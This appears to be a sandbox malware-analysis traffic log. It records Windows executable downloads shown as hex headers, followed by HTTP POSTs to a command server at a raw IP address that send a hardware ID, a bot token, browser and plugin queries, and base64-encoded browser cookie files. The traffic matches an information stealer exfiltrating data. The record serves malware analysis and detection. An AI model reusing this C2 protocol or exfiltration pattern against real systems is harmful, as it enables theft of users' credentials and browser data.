Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 14:06:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 14:06:57 GMTContent-Type: application/octet-streamContent-Length: 3197440Last-Modified: Sat, 07 Dec 2024 13:54:07 GMTConnection: keep-aliveETag: "6754537f-30ca00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 31 00 00 04 00 00 48 22 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 bc 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bc 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 66 6b 75 6f 6e 63 66 69 00 10 2a 00 00 b0 06 00 00 0e 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 67 73 6d 62 69 73 72 00 10 00 00 00 c0 30 00 00 04 00 00 00 a4 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 30 00 00 22 00 00 00 a8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 14:08:09 GMTContent-Type: application/octet-streamContent-Length: 1840640Last-Modified: Sat, 07 Dec 2024 13:53:52 GMTConnection: keep-aliveETag: "67545370-1c1600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 f0 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 49 00 00 04 00 00 3d 64 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 32 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 40 05 00 00 02 00 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 68 68 68 61 70 69 64 00 b0 19 00 00 30 2f 00 00 a6 19 00 00 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 69 6f 6c 67 72 64 7a 00 10 00 00 00 e0 48 00 00 04 00 00 00 f0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 48 00 00 22 00 00 00 f4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 45 32 35 42 39 46 34 41 32 36 39 39 32 39 33 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="hwid"B61E25B9F4A2699293130------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="build"drum------HIIEGHJJDGHCAKEBGIJK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHJJJECFIECBGDGCAAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 2d 2d 0d 0a Data Ascii: ------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------DHDHJJJECFIECBGDGCAAContent-Disposition: form-data; name="message"browsers------DHDHJJJECFIECBGDGCAA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBGHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 2d 2d 0d 0a Data Ascii: ------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="message"plugins------HDAFHIDGIJKJKECBGDBG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJECFIECBFIDGDAKFHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 2d 2d 0d 0a Data Ascii: ------CGIJECFIECBFIDGDAKFHContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------CGIJECFIECBFIDGDAKFHContent-Disposition: form-data; name="message"fplugins------CGIJECFIECBFIDGDAKFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEBGDAFHJEBGDGIJDHHost: 185.215.113.206Content-Length: 5923Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDHCGHDHIDHCBGCBGCAEHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 2d 2d 0d 0a Data Ascii: ------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------HDHCGHDHIDHCBGCBGCAEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------HDHCGHDHIDHCBGCBGCAE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDAAFBGDBKJJJKFIIIJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 2d 2d 0d 0a Data Ascii: ------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIDAAFBGDBKJJJKFIIIJContent-Disposition: form-data; name="file"------IIDAAFBGDBKJJJKFIIIJ--
